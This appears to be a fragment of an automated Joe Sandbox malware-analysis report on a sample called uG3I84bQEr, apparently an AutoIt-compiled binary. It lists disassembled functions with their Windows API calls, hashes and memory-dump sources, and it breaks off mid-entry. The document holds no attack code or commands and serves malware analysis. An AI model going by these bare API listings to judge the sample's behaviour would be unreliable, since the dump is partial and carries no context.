                                                            • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                            • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                                                            APIs
                                                              • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                              • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                              • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                            • _free.LIBCMT ref: 004696A2
                                                            • _free.LIBCMT ref: 004696A9
                                                            • _free.LIBCMT ref: 00469714
                                                              • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                              • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                            • _free.LIBCMT ref: 0046971C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                            • String ID:
                                                            • API String ID: 1552873950-0
                                                            • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                            • Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
                                                            • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                            • Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                            • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                                                            • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                            • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                                                            APIs
                                                            • SetFilePointerEx.KERNEL32 ref: 00B5B2BA
                                                            • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00B5B2E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: File$PointerWrite
                                                            • String ID:
                                                            • API String ID: 539440098-0
                                                            • Opcode ID: 77587c797ec236fc36632d525777df04de4964db5fdd58029de59e0fb332c4f9
                                                            • Instruction ID: 4c295b49ff85a7478e2e5e7bfd44a70a3014fbb12fa914077f8c6f438552b18d
                                                            • Opcode Fuzzy Hash: 77587c797ec236fc36632d525777df04de4964db5fdd58029de59e0fb332c4f9
                                                            • Instruction Fuzzy Hash: 2431706040C384AED7119B258855F2BBFE0EF92716F4885CEEC94A7291D3B9880C87A7
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: AU3!P/I$EA06
                                                            • API String ID: 4104443479-1914660620
                                                            • Opcode ID: be4a598cdef8c251a5adadd267ea1991f2ed74b36d28d1cb344cd6b9d9c92c66
                                                            • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                                                            • Opcode Fuzzy Hash: be4a598cdef8c251a5adadd267ea1991f2ed74b36d28d1cb344cd6b9d9c92c66
                                                            • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                                                            APIs
                                                            • _memset.LIBCMT ref: 0043EA39
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                                                              • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                              • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                            • String ID: X
                                                            • API String ID: 3777226403-3081909835
                                                            • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                            • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                                                            • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                            • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                                                            • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                                                            • Opcode Fuzzy Hash: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                                                            • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                            • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                                                            • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                            • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                            • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                                                            • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                            • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                                                            APIs
                                                            • GetFileSize.KERNEL32(?,00B58FCC,?,00000001,?,00000002,?,?), ref: 00B598BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: FileSize
                                                            • String ID:
                                                            • API String ID: 3433856609-0
                                                            • Opcode ID: 6e6d82ca2c839b6c7ab8a9e823714aab8534c568a6a25203cc49cfd9853ed81d
                                                            • Instruction ID: 210fab5147026b028d14712bddd3387f33085c5d10c369b12e5a006372cef69e
                                                            • Opcode Fuzzy Hash: 6e6d82ca2c839b6c7ab8a9e823714aab8534c568a6a25203cc49cfd9853ed81d
                                                            • Instruction Fuzzy Hash: F191236090C381DFEB364B2458557757BE5EB62763F4C05DADC82AB0B2EA698C0DC362
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ComputerName
                                                            • String ID:
                                                            • API String ID: 3545744682-0
                                                            • Opcode ID: e1241f5e12b7ad10a6e6ac3a3c0ec815a7e19922194f0aea2da16b69a33e3144
                                                            • Instruction ID: dcff5515763d25f2cad07ef8b10e3105ec867fa6a9a43c2f5031c6630150888b
                                                            • Opcode Fuzzy Hash: e1241f5e12b7ad10a6e6ac3a3c0ec815a7e19922194f0aea2da16b69a33e3144
                                                            • Instruction Fuzzy Hash: 0E21B2F06CD3406BDA3556148C0ABB53AF4EF62710F84C4EAA4BD561E2EDA42C048267
                                                            APIs
                                                            • _memset.LIBCMT ref: 00404370
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$_memset
                                                            • String ID:
                                                            • API String ID: 1505330794-0
                                                            • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                            • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                                                            • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                            • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                                                            APIs
                                                            • __FF_MSGBANNER.LIBCMT ref: 00425733
                                                              • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                                                              • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                                                            • __NMSG_WRITE.LIBCMT ref: 0042573A
                                                              • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                                                              • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                                                              • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                                                              • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                                                              • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                            • RtlAllocateHeap.NTDLL(00D40000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1372826849-0
                                                            • Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                            • Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
                                                            • Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                            • Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                                                            • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                                                            • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                            • Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
                                                            • Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                            • Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C
                                                            APIs
                                                            • _free.LIBCMT ref: 00468D1B
                                                              • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                              • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                            • _free.LIBCMT ref: 00468D2C
                                                            • _free.LIBCMT ref: 00468D3E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                            • Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
                                                            • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                            • Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CALL
                                                            • API String ID: 0-4196123274
                                                            • Opcode ID: 57bf66ca5a732462c0e94270d821faeae316ae41fed408d5a65c112708b386ad
                                                            • Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
                                                            • Opcode Fuzzy Hash: 57bf66ca5a732462c0e94270d821faeae316ae41fed408d5a65c112708b386ad
                                                            • Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 72df622632d4a502952e0c747a2791bf633f2f1d9c0c323454d63d9f2ecdf6ad
                                                            • Instruction ID: 665aeeeda7618be144ab26ba5ea9c3b14b1a5e971dff4faecb2a1d88e99e5761
                                                            • Opcode Fuzzy Hash: 72df622632d4a502952e0c747a2791bf633f2f1d9c0c323454d63d9f2ecdf6ad
                                                            • Instruction Fuzzy Hash: 8841D7716082059BCB10FFA9D8859BAB7E8EF49308B64445FE14597382EF3D9C05CB6A
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 00404834
                                                              • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                                                              • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                                                              • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                                                              • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                                                              • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                                                              • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                              • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                              • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                              • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
